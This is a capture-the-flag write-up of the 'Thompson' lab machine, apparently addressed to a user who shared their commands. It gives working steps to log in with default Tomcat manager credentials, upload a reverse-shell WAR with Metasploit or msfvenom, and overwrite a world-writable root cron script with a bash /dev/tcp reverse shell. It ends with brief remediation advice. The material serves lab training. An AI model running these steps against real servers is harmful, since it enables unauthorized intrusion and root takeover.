Target IP: thompson.thm (Requires /etc/hosts entry) Difficulty: Easy Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

The “Thompson” machine exposes an Apache Tomcat administrative interface on port 8080. We gain initial access by guessing default credentials (tomcat:s3cret) for the Tomcat Manager App and uploading a malicious WAR file via Metasploit to achieve Remote Code Execution (RCE). Privilege escalation is achieved by identifying a system cron job running a script (id.sh) as root. Due to misconfigured write permissions, we overwrite this script with a reverse shell payload to gain root access.

Key TTPs (MITRE ATT&CK):

  • T1078 (Valid Accounts): Default Credentials (tomcat:s3cret).
  • T1190 (Exploit Public-Facing App): Uploading malicious WAR to Tomcat.
  • T1053 (Scheduled Task/Job): Exploiting a Cron Job running as root.
  • T1574 (Hijack Execution Flow): Modifying a script executed by a privileged process.

2. Operational Setup

Host Configuration

echo "10.10.x.x thompson.thm" | sudo tee -a /etc/hosts

Workspace

  • Pane 1: msfconsole.
  • Pane 2: nc -lvnp 6969 (For the Cron job shell).
  • Pane 3: Notes.

3. Enumeration: “What do we see?”

A. Network Scanning

nmap -sC -sV -p- -oA nmap/thompson thompson.thm

Results:

  • 22/tcp (SSH): OpenSSH 7.2p2.
  • 8009/tcp (AJP13): Apache Jserv.
  • 8080/tcp (HTTP): Apache Tomcat 8.5.5.

B. Web Enumeration (Tomcat)

We navigate to http://thompson.thm:8080. It’s the default Tomcat landing page. We try to access the Manager App at /manager/html. It prompts for Basic Authentication.

Credential Guessing: Before using Hydra, we try standard defaults manually:

  • admin:admin
  • tomcat:tomcat
  • tomcat:s3cret -> Success!

4. Initial Access: WAR File Upload

The Tomcat Manager allows users to upload .war (Web Archive) files. Tomcat automatically unpacks and executes them.

Method: Metasploit (Your approach)

You mentioned using Meterpreter, which automates the WAR generation and upload.

msfconsole
use exploit/multi/http/tomcat_mgr_upload
set RHOSTS thompson.thm
set RPORT 8080
set HttpPassword s3cret
set HttpUsername tomcat
set LHOST tun0
set LPORT 4444
run

Result: Meterpreter session opened as user tomcat. User Flag: Located at /home/jack/user.txt.


5. Privilege Escalation: Cron Job Hijacking

Enumeration

Once inside, we check for scheduled tasks.

cat /etc/crontab

Output:

* * * * * root cd /home/jack && bash id.sh

Analysis:

  • User: root runs this command.
  • Frequency: Every minute (* * * * *).
  • Action: It goes to /home/jack and executes id.sh.

The Vulnerability

We check the permissions of this file.

ls -l /home/jack/id.sh
# -rwxrwxrwx 1 jack jack ... id.sh

Critical Flaw: The file is writable by everyone (or at least writable by the tomcat user if groups overlap, but usually it’s world-writable on this box).

Exploitation

We overwrite the script with the commands you provided. This replaces the legitimate content with a reverse shell.

1. Set up Listener (Pane 2):

nc -lvnp 6969

2. Inject Payload (On Target):

# We overwrite id.sh completely
echo '#!/bin/bash' > /home/jack/id.sh
echo 'bash -i >& /dev/tcp/10.10.YOUR.IP/6969 0>&1' >> /home/jack/id.sh
chmod +x /home/jack/id.sh

3. Wait: Wait up to 60 seconds for the cron daemon to trigger the job.

Result: The listener in Pane 2 catches the shell.

# whoami
root

Root Flag: /root/root.txt.


6. Alternative Vector (Manual WAR)

If Metasploit is not allowed (e.g., OSCP), here is how you do the Initial Access manually:

  1. Generate Payload:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=4444 -f war > shell.war
  1. Upload: Go to the Tomcat Manager (/manager/html), scroll down to “WAR file to deploy,” browse to shell.war, and click Deploy.
  2. Trigger: Click on /shell in the application list.
  3. Catch: nc -lvnp 4444.

7. Remediation (Blue Team)

  1. Change Default Credentials:
  • The tomcat-users.xml file contains tomcat:s3cret. This must be changed immediately or the user removed.
  1. Restrict Manager Access:
  • The Manager App should not be exposed to the public internet. Restrict access via IP allowlisting in context.xml.
  1. File Permissions:
  • Scripts executed by root via Cron must be owned by root and writable only by root.
  • Fix: chown root:root /home/jack/id.sh and chmod 700 /home/jack/id.sh.